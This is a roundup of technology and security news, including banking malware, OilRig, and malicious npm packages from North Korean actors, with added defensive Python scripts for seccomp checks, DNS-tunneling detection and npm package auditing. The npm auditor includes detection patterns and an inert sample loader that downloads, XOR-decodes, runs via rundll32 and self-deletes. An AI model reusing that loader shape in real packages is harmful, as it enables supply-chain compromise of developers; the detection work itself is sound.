Snowblind is a new Android banking malware abusing a safety tool


Mobile app security provider Promon has uncovered a never-before-seen Android banking malware. Dubbed Snowblind, it uses a novel technique to exploit Android OS functionality and compromise banking apps. The firm says the malware is effective on all Android devices, including even those with the strongest security measures. Countering it requires app-level security enhancements to prevent potential financial loss.

Snowblind is a first-of-its-kind Android banking malware

Snowblind appears to be one of the most advanced Android banking malware families, with novel anti-detection techniques. According to Promon, the malware manipulates a Linux kernel safety feature built into Android OS called “seccomp” (secure computing). The feature “controls what an app is allowed to do by limiting the system calls, or requests, an application can make from the operating system.”

Like most other malware, Snowblind relies on exploiting accessibility services to gain system-level access to an infected device and perform malicious activities without the user’s knowledge. However, since Android has security measures in place to detect malicious accessibility services, it modifies apps to prevent detection. It “performs a normal repackaging attack” with a lesser-known technique based on seccomp.

Promon says Snowblind’s technique abuses the seccomp functionality “to intercept and manipulate system calls,” which enables it to bypass security checks and anti-tampering mechanisms. This allows the attackers to stealthily execute malicious activities on the device. They can use other functions of the malware to steal login credentials for a banking app and make unauthorized transactions.
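The seccomp state of a process is visible in its `/proc/<pid>/status` file: the `Seccomp` field gives the mode (0 disabled, 1 strict, 2 filter) and, on Linux 5.9 and newer, `Seccomp_filters` gives the number of BPF filters attached. Android app processes already run in filter mode with a baseline filter installed by the zygote, so a filter count above that baseline is the kind of signal an app-level check can look for. The script below is an added illustration of reading and interpreting those fields; it is not Promon's or Snowblind's code, and the baseline count is an assumption you would measure on a known-clean device, not a value from the article.

```python
"""Read and interpret the seccomp fields of /proc/<pid>/status.

Added example for the seccomp discussion above. The baseline filter count
passed to extra_filters()/describe() is an assumption measured on a clean
device; the article gives no number.
"""
from pathlib import Path

# Mode values as reported by the kernel in the "Seccomp:" line.
SECCOMP_MODES = {0: "disabled", 1: "strict", 2: "filter"}


def parse_seccomp_status(status_text):
    """Return (mode, filter_count) parsed from /proc/<pid>/status text.

    filter_count is None when the kernel predates the Seccomp_filters field
    (added in Linux 5.9); a missing Seccomp field altogether is an error.
    """
    mode = None
    filters = None
    for line in status_text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        value = value.strip()
        if key == "Seccomp":
            mode = int(value)
        elif key == "Seccomp_filters":
            filters = int(value)
    if mode is None:
        raise ValueError("status text has no Seccomp field (seccomp unsupported?)")
    return mode, filters


def read_process_seccomp(pid="self"):
    """Read the live status file of a process (Linux/Android only)."""
    return parse_seccomp_status(Path(f"/proc/{pid}/status").read_text())


def extra_filters(observed, baseline_filters):
    """Number of attached filters beyond the expected baseline (0 if none).

    Only meaningful in filter mode and on kernels that report the count.
    """
    mode, filters = observed
    if mode != 2 or filters is None:
        return 0
    return max(0, filters - baseline_filters)


def describe(observed, baseline_filters):
    """Human-readable summary, noting any filters above the baseline."""
    mode, filters = observed
    text = f"seccomp mode {mode} ({SECCOMP_MODES.get(mode, 'unknown')})"
    if filters is not None:
        text += f", {filters} filter(s) attached"
    extra = extra_filters(observed, baseline_filters)
    if extra:
        text += f"; {extra} more than the expected baseline of {baseline_filters}"
    return text


if __name__ == "__main__":
    # Constructed sample as it might be pulled from an app process on a device.
    sample = "Name:\tcom.example.bank\nSeccomp:\t2\nSeccomp_filters:\t2\n"
    print(describe(parse_seccomp_status(sample), baseline_filters=1))
    try:
        print("this process:", describe(read_process_seccomp("self"), baseline_filters=0))
    except FileNotFoundError:
        print("no /proc on this platform")
```

One caveat follows directly from the article: a filter that intercepts system calls can also lie about what a file read returns, so a check like this inside the protected app is one signal among several, not proof of a clean process. Comparing the same fields from a separate process (for example a rooted test device via `adb shell cat /proc/<pid>/status`) avoids that blind spot during analysis.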

To make their work easier, Snowblind can disable security features such as two-factor authentication (2FA) and biometric verification. It can also exfiltrate sensitive personally identifiable information and transaction data from the app. This data can be exploited later for fraudulent activities, including impersonation. Since Snowblind attacks the app itself, it is effective on all modern Android devices.


Snowblind’s technique is new, so most apps are vulnerable

The security firm discovered that the Snowblind Android malware is currently designed to target banking apps in Southeast Asia specifically. However, the firm found its seccomp-based technique “more interesting than the malware itself,” so much so that threat actors may soon devise more types of exploits and attacks based on it. To make matters worse, it is a new technique, and most modern apps lack protection against it.

Promon says it has developed protective measures against Snowblind and other potential variants of seccomp-based attacks and malware strains. Version 6.5.2 or newer of its Promon SHIELD platform offers these protections. Developers can employ the solution to keep their apps safe. For end users, these types of powerful banking malware are a reminder that we shouldn’t install apps from unknown sources. Never download files from shady websites or via forwarded links. Always visit the official website of a developer or an official app store to download apps.



A new AI trade group will help push AI regulations in the U.S.


Right now, it’s the Wild West on the AI landscape. We’re still waiting for actual laws and regulations regarding the technology. It’s been almost two years since ChatGPT hit the scene, so we’re overdue for some sort of structure. According to a new report, several entities banded together to form an AI trade group.

Right now, there are lawsuits floating around regarding AI technology. The New York Times is suing OpenAI and Microsoft for copyright infringement. Also, several top record labels are suing AI music generators for much the same reason. We’re still waiting for the results from those cases. The results from those cases could have an effect on the AI market as a whole.

Several content licensing companies have developed an AI trade group

Rightsify, vAIsual, Pixta, and Datarade are some of the companies involved in this new AI trade group, which will advocate for the ethical sourcing of data to train AI models. Together, they formed the Dataset Providers Alliance (DPA). A big part of what the alliance will be doing will focus on pushing for legislation regarding the use of AI.

For example, the DPA will push for the NO FAKES ACT to pass in the U.S. This is the bill that forbids entities from using digital copies of people’s likeness or voice. We’ve seen examples of this, and celebrities are the main target.

Along with that, the DPA will push for companies to be more transparent about how they’re sourcing and using the data they get. According to Alex Bestall, CEO of Rightsify and GCX, the alliance plans to release a white paper in July.

This is just the kind of thing that the AI space needs. Right now, there’s no telling how many people have had their content scraped to train AI models without their consent. There’s nothing that the average Joe can do because large trillion-dollar companies like Google are always going to have their way. So, it’s important that we have alliances like these to help even the playing field.



Strava starts rolling out Dark Mode to its Android and iOS apps

Strava announced last month a bunch of improvements coming to its app in the next few months including a dark mode, AI tools, as well as a new Family Plan subscription, the sister of the company’s Student Plan.

While some of the new features have already been implemented, it took Strava slightly more than a month to bring the promised Dark mode to its Android and iOS apps (via 9to5google).

One of Strava’s most requested features, Dark mode promises to improve the in-app experience for all users. Obviously, the biggest benefit of having Dark mode enabled is the reduction in eye strain, but the functionality also improves accessibility while scrolling through the feed.

Strava users have a couple of options at their disposal when choosing the right Dark mode setting. For instance, the integration comes with “Always Dark” and “Always Light” toggles, as well as the option to match your device’s settings.

In other news, Strava users should prepare for a wave of AI-oriented features, such as the AI-enabled Leaderboard Integrity, which promises to “harness machine learning to automatically flag irregular, improbable, or impossible activities recorded to the platform.”

Strava says that this leaderboard feature has been trained on millions of activities, and its aim is to let users enjoy their time spent on the platform without feeling that they have been cheated by other users.

Other important new improvements coming to Strava include features like Night Heatmaps, Quick Edit, and Strive for More. Night Heatmaps only show activities between sundown and sunrise, while Quick Edit allows Strava users to make edits – like activity name, privacy settings – on the fly.

Last but not least, Strive for More is a program that aims to promote and support women in movement and sport. In this regard, Strava announced last month a partnership with TOGETHXR to encourage women to watch and play women’s sports.



OilRig Hackers Attacking Individuals And Organizations In The Middle East


OilRig is an Iranian-linked cyber espionage group that has been active since 2015, and this group is known for its sophisticated spear-phishing campaigns and advanced infiltration techniques. 

This group conducts a multitude of cyber attacks against various sectors, and among them, the most executed ones are intelligence gathering, surveillance, and high-profile cyberattacks.

Besides this, cybersecurity researchers at Cyble recently identified that OilRig hackers have been actively attacking Middle Eastern entities and organizations related to Iranian interests. 

The group continually evolves its tools to evade detection and has expanded its operations to include disruptive attacks like ransomware and data-wiping.


OilRig Hackers Attacking Individuals

OilRig targets over 20 countries across various regions:-

Origin and Targeted Countries (Source – Cyble)

It attacks diverse sectors including:-

  • Aerospace & Defense 
  • BFSI 
  • Chemicals 
  • Education 
  • Energy & Utilities 
  • Government & LEA 
  • Hospitality 
  • IT & ITES 
  • Technology 
  • Telecommunication 

The group employs customizable attack vectors, often starting with spear-phishing or exploiting public-facing applications to deliver malware for data exfiltration. 

OilRig is suspected to have links with Greenbug and is known for exploiting unpatched SharePoint servers. Its extensive reach and adaptable tactics make it a significant threat in the cyber espionage landscape.

The group OilRig made use of LinkedIn-based phishing masquerading as Cambridge University Members and exploited already known vulnerabilities like CVE-2019-0604 and CVE-2017-11882.

LinkedIn Message Asking to Download File (Source – Cyble)

For persistence, OilRig uses malicious loaders, VBScript, or scheduled tasks. Their arsenal also includes various RATs like Alma Communicator and BONDUPDATER, among others.

The group also employs living-off-the-land tactics to attack public-facing applications in its operations, as the Cyble report reads.

Cyble also links IPs and domains from previous attacks, which illuminates the group’s development as a continuous threat touching many sectors.

Here below we have mentioned all the tools used:-

  • Alma Communicator
  • BONDUPDATER
  • Clayslide
  • DistTrack
  • DNSExfiltrator
  • DNSpionage
  • Dustman
  • Fox Panel
  • Helminth
  • ISMAgent
  • ISMDoor
  • ISMInjector
  • Karkoff
  • Mimikatz
  • LaZagne
  • LIONTAIL
  • LONGWATCH
  • SideTwist
  • Neuron
  • Nautilus
  • PICKPOCKET
  • Plink
  • PsList
  • RDAT
  • Saitama
  • SpyNote RAT
  • TONEDEAF

OilRig is a group of elite hackers who are experts in cyber espionage. They specialize in secret C&C communication using various methods.

They have targeted Exchange servers and developed HTTPSnoop implants, C2 over HTTP and DNS queries, and protocol tunneling for stealthy network communications.
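C2 over DNS queries tends to leave a recognisable trace in resolver logs: one client sending many never-repeated, high-entropy subdomains to the same base domain, often as TXT lookups. The detector below is an added example, not Cyble's tooling, and the log format (timestamp, client, query type, query name) and every hostname and address in it are constructed for the illustration. It uses the last two labels as the "base domain", a simplification; production code would use the public suffix list.

```python
"""Flag clients whose DNS queries look like a tunneling or exfiltration channel.

Added example for the OilRig write-up above; the log lines are constructed
and the thresholds are assumptions to tune against your own resolver data.
"""
import math
from collections import Counter, defaultdict

# Constructed resolver log: "<timestamp> <client> <qtype> <qname>".
SAMPLE_DNS_LOG = """\
2024-06-26T10:00:01Z 10.0.0.12 A www.example.com
2024-06-26T10:00:03Z 10.0.0.12 TXT f0e1d2c3b4a5968778695a4b3c2d1e0f.example-cdn.invalid
2024-06-26T10:00:04Z 10.0.0.7 A api.example.org
2024-06-26T10:00:05Z 10.0.0.12 TXT 0123456789abcdeffedcba9876543210.example-cdn.invalid
2024-06-26T10:00:06Z 10.0.0.12 A mail.example.com
2024-06-26T10:00:07Z 10.0.0.12 TXT a1b2c3d4e5f607899870f6e5d4c3b2a1.example-cdn.invalid
2024-06-26T10:00:08Z 10.0.0.7 A static.example.org
2024-06-26T10:00:09Z 10.0.0.12 TXT 5f4e3d2c1b0a96877869a0b1c2d3e4f5.example-cdn.invalid
2024-06-26T10:00:10Z 10.0.0.12 TXT c9d8e7f6a5b403122130b4a5f6e7d8c9.example-cdn.invalid
2024-06-26T10:00:11Z 10.0.0.12 A cdn.example.com
"""


def shannon_entropy(s):
    """Bits of entropy per character; encoded data scores far above hostnames."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def detect_dns_tunneling(log_text, min_unique=5, min_entropy=3.0):
    """Group queries by (client, base domain) and flag suspicious groups.

    A group is flagged when the client used at least `min_unique` distinct
    subdomains whose mean entropy is at least `min_entropy` bits/char.
    """
    groups = defaultdict(lambda: {"subdomains": set(), "queries": 0, "txt": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than fail the whole run
        _, client, qtype, qname = parts
        labels = qname.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue  # no subdomain in which data could be encoded
        base = ".".join(labels[-2:])          # simplification: last two labels
        sub = "".join(labels[:-2])            # everything the client controls
        g = groups[(client, base)]
        g["subdomains"].add(sub)
        g["queries"] += 1
        if qtype.upper() == "TXT":
            g["txt"] += 1

    stats, flagged = {}, []
    for key, g in groups.items():
        mean_entropy = sum(shannon_entropy(s) for s in g["subdomains"]) / len(g["subdomains"])
        stats[key] = {
            "queries": g["queries"],
            "unique_subdomains": len(g["subdomains"]),
            "txt_queries": g["txt"],
            "mean_entropy": round(mean_entropy, 3),
        }
        if len(g["subdomains"]) >= min_unique and mean_entropy >= min_entropy:
            flagged.append(key)
    return {"stats": stats, "flagged": sorted(flagged)}


if __name__ == "__main__":
    report = detect_dns_tunneling(SAMPLE_DNS_LOG)
    for key in report["flagged"]:
        print("suspicious:", key, report["stats"][key])
```

Unique-subdomain count is what separates a tunnel from ordinary chatty clients: a busy browser queries many hosts under many base domains, whereas encoded data produces many hosts under one base domain, each seen once. Adjust `min_unique` upward for large time windows so that CDN-style hostnames do not trip the rule.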

Recommendations

Here below we have mentioned all the recommendations:-

  • Regular software patching
  • Enhanced email security
  • Robust network monitoring
  • Advanced endpoint protection
  • Strict access control
  • Comprehensive incident response plan
  • Utilize threat intelligence
  • Ongoing employee cybersecurity training




Leaked Galaxy Z Fold 6 & Flip 6 prices raise eyebrows


As expected, Samsung announced its next Unpacked today. The big launch event will take place on July 10 in Paris, France. Leaks have already revealed what the company has in store. It will unveil new foldables, watches, earbuds, and more. As we wait for the event, a fresh leak has disclosed the alleged prices of the Galaxy Z Fold 6 and Galaxy Z Flip 6, along with their storage variants and color options.

Galaxy Z Fold 6 & Flip 6 prices leaked again, but they may not be accurate

A few weeks ago, we got word that Samsung will increase the prices of its next-gen foldables. Both the Galaxy Z Fold 6 and Galaxy Z Flip 6 were said to cost about $100 more than their respective predecessors in the US, putting their starting prices at $1,900 and $1,100. The latest leak now gives us European prices of the upcoming foldables. Unsurprisingly, Samsung is charging more in Europe too.

However, before diving deeper, let us tell you that the alleged prices seem a little off. The report says the new Fold will see a price jump of a whopping €300 across the board. This may not be true. The upcoming book-style foldable doesn’t have anything that warrants such a massive price hike. The Flip’s reported price hike of €130 is more reasonable, but we’d still advise you to take this information with some caution.

This being said, let us break down the prices. Samsung will reportedly price the 256GB Galaxy Z Fold 6 at €2,200 in Europe, up €300 from €1,900. Likewise, its 512GB storage model costs €2,330 instead of €2,040 and the 1TB model costs €2,580 instead of €2,280. All three storage variants will have 12GB of RAM—there is no 16GB RAM option for the phone. Color options include Silver, Pink, and Navy.

Coming to the Galaxy Z Flip 6, Samsung is upgrading it to 12GB RAM with 256GB and 512GB storage options, priced at €1,330 and €1,450, respectively. These prices are €130 more than the Flip 5’s €1,199 and €1,319. The device has more notable hardware upgrades—RAM boost, new primary rear camera (50MP), and bigger battery (4,000mAh)—so this price hike may be justified. It comes in Blue, Mint, and Silver Shadow colors.

You can already pre-reserve the upcoming foldables

Samsung has already started accepting pre-reservations for the Galaxy Z Fold 6 and Galaxy Z Flip 6. You can reserve either foldable before July 10 to get a $50 credit that you can redeem on Samsung’s online store when purchasing the device. However, if the leaked prices are accurate, the foldable duo could be a tough buy. You might be better off picking up the 2023 model at a discount, or perhaps grabbing one from some other brand. The foldable market has no shortage of options.



New North Korean Actor Distributing Malicious NPM Packages


Early in 2024, North Korean threat actors persisted in using the public npm registry to disseminate malicious packages that were similar to those that Jade Sleet had previously used. 

Initially thought to be an extension of Jade Sleet’s activity, further investigation revealed a new threat actor targeting the open-source ecosystem through the npm registry, highlighting the ongoing risk posed by North Korean actors despite heightened awareness within the security community. 

Timeline

A new North Korean threat actor, Moonstone Sleet, leverages the open-source software supply chain vulnerability by distributing malware through malicious packages on the public npm registry.


This tactic, which is comparable to that of other North Korean actors like Jade Sleet, exposes developers to potential compromise and emphasizes the ongoing threat that state-sponsored actors pose to the integrity of the open-source ecosystem. 

Microsoft has identified a new North Korean threat actor, Moonstone Sleet, that uses various tactics (TTPs) for financial gain and espionage, which overlap with other North Korean actors but also include unique methods. 

Malicious Payload Execution 

Similar to techniques reported by Phylum, Moonstone Sleet distributes malicious npm packages through both targeted freelancing platforms and the public npm registry, which expands their reach and increases the chance of unsuspecting developers installing their malware.  

An analysis of malicious npm packages by Checkmarx reveals distinct code styles between those linked to Jade Sleet (Spring/Summer 2023) and Moonstone Sleet (Late 2023/Early 2024). Jade Sleet’s packages employed a two-part strategy to evade detection. 

The first, published under a separate account, created a directory and fetched updates from a remote server, establishing the infrastructure for the second package, likely containing the malicious payload, to execute on the compromised machine. 

Code of the first package in the pair (Source – Checkmarx)

The second package in the pair acts as a downloader and executor. It retrieves a token from a file created by the first package and uses it to download malicious code from a specific URL; that code is then written to a new file on the victim’s machine and executed as a Node.js script, unleashing its malicious functionality. 

Code of the second package in the pair (Source – Checkmarx)

The two-package approach is a shift from the single-package method used in late 2023 and early 2024, where the payload was directly encoded and executed upon installation.

The attackers seem to be refining their technique by using a separate downloader to potentially evade detection while maintaining the core malicious functionality.  

Attackers are using malicious open-source packages to deliver payloads, which download a file, decrypt it using a simple XOR, rename it, and execute it via rundll32 on Windows. 

To evade detection, the package self-cleans by deleting temporary files and replacing its malicious code with a clean version, while the attack evolved in Q2 2024, with packages becoming more complex, using obfuscation, and targeting Linux systems as well.
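The traits described above are all visible in an unpacked package before anything runs: a lifecycle hook in package.json (npm executes `preinstall`, `install`, `postinstall` and `prepare` automatically), and script code that fetches from the network, writes a file, hands it to `child_process` or `rundll32`, XOR-decodes a buffer, or deletes its own files afterwards. The auditor below is an added example, not Checkmarx's, Phylum's or Microsoft's tooling. The package names, the fixture script and the trait weights are constructed for the illustration; the fixture deliberately references undefined identifiers so it does nothing if executed.

```python
"""Audit an unpacked npm package for install-time execution and loader traits.

Added example for the Moonstone Sleet write-up above. Package names, fixture
code and scoring weights are constructed assumptions, not values from the
article or from any real package.
"""
import json
import re
import tempfile
from pathlib import Path

# Hooks npm runs on its own during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Code traits matching the loader behaviour described in the article.
TRAITS = {
    "spawns_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "fetches_remote": re.compile(r"\b(?:https?\.get|fetch|axios\.get)\s*\("),
    "writes_file": re.compile(r"\bfs\.(?:writeFile|writeFileSync|createWriteStream)\s*\("),
    "uses_rundll32": re.compile(r"rundll32", re.IGNORECASE),
    "xor_decodes": re.compile(r"\^\s*(?:0x[0-9a-fA-F]+|\d+|\w+\[)"),
    "self_cleans": re.compile(r"\bfs\.(?:unlink|unlinkSync|rm|rmSync)\s*\("),
}
WEIGHTS = {"spawns_process": 3, "fetches_remote": 2, "writes_file": 1,
           "uses_rundll32": 3, "xor_decodes": 2, "self_cleans": 2}


def audit_package(pkg_dir):
    """Return hooks, matched traits and a score for one unpacked package."""
    pkg_dir = Path(pkg_dir)
    manifest = json.loads((pkg_dir / "package.json").read_text())
    scripts = manifest.get("scripts", {})
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    # Scan every .js file, not only the one a hook names: the payload may be
    # reached through a require() chain rather than the hook command itself.
    traits = set()
    for js in pkg_dir.rglob("*.js"):
        text = js.read_text(errors="replace")
        traits.update(name for name, rx in TRAITS.items() if rx.search(text))
    score = sum(WEIGHTS[t] for t in traits)
    if hooks and traits:
        score += 3  # loader-like code that runs automatically at install time
    return {"name": manifest.get("name"), "hooks": hooks,
            "traits": sorted(traits), "score": score}


# Constructed fixture mirroring the loader shape from the article. REMOTE and
# OUT are intentionally undefined, so executing it would only throw.
SUSPICIOUS_JS = """\
const cp = require('child_process');
const fs = require('fs');
const https = require('https');
https.get(REMOTE, (res) => res.pipe(fs.createWriteStream(OUT)));
const buf = fs.readFileSync(OUT);
for (let i = 0; i < buf.length; i++) buf[i] = buf[i] ^ 0x5a;
cp.exec('rundll32 ' + OUT + ',Start', () => fs.unlinkSync(OUT));
"""


def write_sample_packages(root):
    """Create one suspicious and one benign package under root; return their paths."""
    root = Path(root)
    bad = root / "update-helper"  # constructed name
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "update-helper", "version": "1.0.0",
        "scripts": {"postinstall": "node loader.js"}}))
    (bad / "loader.js").write_text(SUSPICIOUS_JS)
    good = root / "tiny-add"  # constructed name
    good.mkdir()
    (good / "package.json").write_text(json.dumps({"name": "tiny-add", "version": "1.0.0"}))
    (good / "index.js").write_text("module.exports = (a, b) => a + b;\n")
    return bad, good


def demo():
    """Audit both fixtures in a throwaway directory and return the two reports."""
    with tempfile.TemporaryDirectory() as d:
        bad, good = write_sample_packages(d)
        return audit_package(bad), audit_package(good)


if __name__ == "__main__":
    for report in demo():
        print(report)
```

Each trait on its own is common in legitimate tooling (build scripts download, write and spawn all the time), which is why the score adds a bonus only when such code is wired to a lifecycle hook; that combination is what turns a package into a loader that runs on `npm install` without the developer ever calling it. Run `npm install --ignore-scripts` while auditing so the package under review cannot execute before you have looked at it.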




Malwarebytes Premium stops 100% of malware during AV Lab test


Malwarebytes Premium has maintained its long-running, perfect record in protecting users against online threats by blocking 100% of the malware samples deployed in the AV Lab Cybersecurity Foundation’s “Advanced In-The-Wild Malware Test.”

For its performance in the May 2024 evaluation, Malwarebytes Premium also received a certificate of “Excellence.”

According to AV Lab, such certificates “are granted to solutions that are characterized by a high level of security, with a rating of at least 99% of blocked threats in the Advanced In-The-Wild Malware Test.”

Every two months, the cybersecurity and information security experts at AV Lab construct a series of tests to compare cybersecurity vendors against the latest malware that is currently being used by adversaries and threat actors.

For the May evaluation, AV Lab tested 521 unique malware samples against 13 cybersecurity products. Malwarebytes Premium Security detected 521/521 malware samples, with a remediation time of 44 seconds—well below the 52-second average determined by AV Lab in its most recent testing.

Three cybersecurity vendors failed to block 100% of malware tested: ESET, F-Secure, and Panda.

To ensure that AV Lab’s evaluations reflect current cyberthreats, each round of testing follows three steps:

  1. Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact on networks and endpoints.
  2. Simulating a real-world scenario in testing: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the prior step. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram.
  3. Incident recovery time assessment: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.”

Malwarebytes is proud to once again achieve a 100% score with AVLab’s Advanced In-The-Wild Malware Test, a trusted resource that proves our commitment to user safety.



Moto G85 launches under the shadow of Motorola’s new foldables


Motorola announced two new flip phones, but that’s not all. A budget phone arrived with them too, the Motorola Moto G85. The thing is, this phone did not launch in the US with the Motorola Razr+ 2024 and Razr 2024.

The Motorola Moto G85 is now official in both Europe and China

The Moto G85 launched in Europe and China. It’s called the Moto S50 Neo in China, actually. This is a budget smartphone, and chances are it won’t be making its way to the US… but it remains to be seen.

The Moto G85 does look really nice, however. It has a curved display with thin bezels and a centered display camera hole. Two vertically-aligned cameras are included on the back. They are located in the top-left corner, and that camera island does blend really well with the rest of the phone’s back.

This smartphone includes a 6.7-inch fullHD+ (2400 x 1080) pOLED display. That is a 10-bit display with a 120Hz refresh rate and a 360Hz touch sampling rate. It offers up to 1,600 nits of brightness.


Qualcomm’s mid-range chip fuels the device

The Snapdragon 6s Gen 3 fuels this phone, Qualcomm’s 6nm chip. Motorola included 12GB of RAM here, and 512GB of internal storage. In China, more RAM and storage options are available. Do note that the storage is also expandable.

A 5,000mAh battery sits inside the device, and 30W fast charging is supported. Android 14 comes pre-installed, with Motorola’s skin, while there are two nano SIM card slots included and a separate microSD card slot.

A 50-megapixel main camera (Sony’s IMX882 sensor, f/1.8 aperture, OIS) sits on the back, along with an 8-megapixel ultrawide unit (f/2.2 aperture, macro, depth camera). A single 32-megapixel unit (f/2.45 aperture) sits on the front.

It is water resistant, and has an in-display fingerprint scanner

The phone does include a set of stereo speakers, and Dolby Atmos is also supported. Two microphones are included on the phone, while the device is IP54 rated for water resistance. Bluetooth 5.1 is also supported, while the phone has an in-display fingerprint scanner too.

The Moto G85 measures 161.91 x 74.06 x 7.59mm, while it weighs 171 grams. There’s vegan leather on its back, by the way, but one additional variant will be available too, probably with glass on the back, we’re still not sure.




Medusa Android banking trojan returns to the US with new capabilities


After nearly a year of lying low, the Medusa banking trojan for Android has resurfaced on security researchers’ radar. Cybersecurity firm Cleafy Threat Intelligence recently detected fresh campaigns targeting users in Europe and North America, including the US. The attackers have deployed more compact variants of the malware, allowing them to operate more stealthily.

New Medusa banking trojan campaigns pose grave threats to Android users

Medusa, aka TangleBot, is an Android banking trojan operating as malware-as-a-service (MaaS). Discovered in 2020, the malware provides attackers with powerful tools to remotely initiate unauthorized financial transactions from infected phones. It boasts features such as keylogging—it can track key presses when you type, allowing threat actors to steal login credentials. The malware can also control the screen and manipulate text messages.

The latest Medusa Android banking trojan campaigns began in May 2024, or at least that is when Cleafy researchers started tracking the new activities. This is the first activity of the trojan since July 2023, the cybersecurity firm reports. As pointed out by Bleeping Computer, the banking trojan is different from “the ransomware gang and the Mirai-based botnet for distributed denial-of-service (DDoS) attacks” of the same name (Medusa).

According to Cleafy, the new campaigns deploy upgraded variants of the banking trojan. These variants are more compact and require fewer permissions to perform the same malicious activities on an infected Android phone. They also boast new features such as full-screen overlaying and screenshot capturing, which make the trojan more powerful than ever. It can initiate fraudulent transactions directly from the device without the user’s knowledge.

Cleafy discovered the activities of the Medusa banking trojan in Canada, France, Italy, Spain, Turkey, the UK, and the US. The criminal minds behind the campaigns rely on smishing (SMS phishing) to trick Android users into side-loading the malware. They distributed the malware through dropper apps, with the security firm identifying 24 campaigns delivering malicious apps via five separate botnets (UNKN, AFETZEDE, ANAKONDA, PEMBE, and TONY).

Dropper apps include a fake Chrome browser

Among the dropper apps used in these Medusa banking trojan campaigns are a fake Chrome browser and a fake streaming app called 4K Sports. The latter appears to be a well-planned bait as the UEFA EURO 2024 football/soccer championship is currently underway in Europe. Unsuspecting users would install it hoping to watch the championship live on their phone, only to potentially fall prey to devastating malware attacks that could wipe out their bank accounts.


Despite a reduced footprint—the malware authors removed 17 commands and several permission requests from the previous version—Medusa banking trojan still requires access to Android’s Accessibility Services and retains its capability to send text messages and access the contact list. Overall, it has become more powerful and more difficult to detect. The malware’s target scope has gotten bigger, potentially opening it up to wider deployment.

As of this writing, Cleafy Threat Intelligence hasn’t discovered any dropper app for the Medusa banking trojan on the Google Play Store. Google’s security measures seem to be doing their work effectively. This means you are safe as long as you don’t download and install dubious apps from the web, particularly from links received in messages from unknown numbers. You should download apps only from official app stores and official company websites.




FireTail Unveils Free Access for All to Cutting-Edge API Security Platform


McLean, United States of America, June 26th, 2024, CyberNewsWire

  • FireTail announces a free version of its enterprise-level API security tools, making them accessible to developers and organizations of all sizes.
  • FireTail’s unique combination of open-source code libraries, inline API call evaluation, security posture management, and centralized audit trails helps eliminate vulnerabilities and protect APIs in real-time.
  • The free plan covers up to 5 APIs, includes 1M API call logs per month, offers 7 days of data retention, and provides clear developer support.

FireTail, a disruptor in API security, unveils free access for all to its cutting-edge API security platform. This initiative opens the door for developers and organizations of any size to access enterprise-level API security tools. 

Today, over 80% of all internet traffic is computer-to-computer communication via APIs. Every mobile app, IoT device, and most modern software applications use APIs, creating a broad attack surface for potential threats. FireTail’s hybrid approach to API security blends open-source code libraries with a feature-packed cloud platform and equips businesses with a unique suite of tools to eliminate API vulnerabilities and provide robust runtime API protection. 

“API security is essential for modern applications, and every developer and tech team should have access to effective security tools,” said Jeremy Snyder, CEO and Co-Founder of FireTail. “Security through obscurity is no longer a viable approach. We’re on a mission to secure all of the world’s APIs and our new free plan ensures ongoing access to an API security platform that delivers genuine insight into the most pressing attack vectors – design flaws in APIs. It’s perfect for smaller organizations striving for stronger API protection, and a great way for individuals or teams within larger organizations to get started.”

Riley Priddle, Co-Founder and CTO at FireTail, added, “We’re excited to help organizations of all sizes to better protect their APIs. We want FireTail to become the de facto standard when it comes to API security. Just because you have a small number of APIs, it doesn’t mean they aren’t critical. We want everyone to have access to the best, enterprise-level API security tools. That’s why we offer both this free tier, as well as our open source libraries.”

For developers and small to medium-sized organizations needing to secure up to 5 APIs, FireTail’s free tier includes comprehensive API security features such as discovery, inventory, assessment, detection and response, and inline runtime protection. Key features include:

  • Protection for up to 5 APIs
  • 1M API calls per month
  • 7 days of logging retention

Thomas Martin, Founder at NephoSec, shared “We’ve been working with FireTail from the outset as both a customer and a distribution partner. Having proven that the platform works for even the largest enterprises with the most complex API security requirements, it’s great to see the team opening that technology up to everyone. This will enable us to solve API security challenges for organizations of all shapes and sizes.”

To access the FireTail API security platform, users can visit https://www.firetail.app or join the team on Tuesday, July 2nd for an in-depth look at what FireTail’s free tier can do.

About FireTail

FireTail allows customers to solve all the most critical problems facing APIs today with a hybrid approach, bringing together cloud, application and code with full blocking capabilities to solve the root causes of API data breaches – flaws at the application and business logic layer in authentication, authorization and data handling. Headquartered in McLean, VA, with offices in Dublin, Ireland, and Helsinki, Finland, FireTail is backed by leading investors, including Paladin Capital, Zscaler, General Advance, and SecureOctane. Users can learn more at https://www.firetail.io.

Contact

Marketing Director
Alan Fagan
FireTail
[email protected]

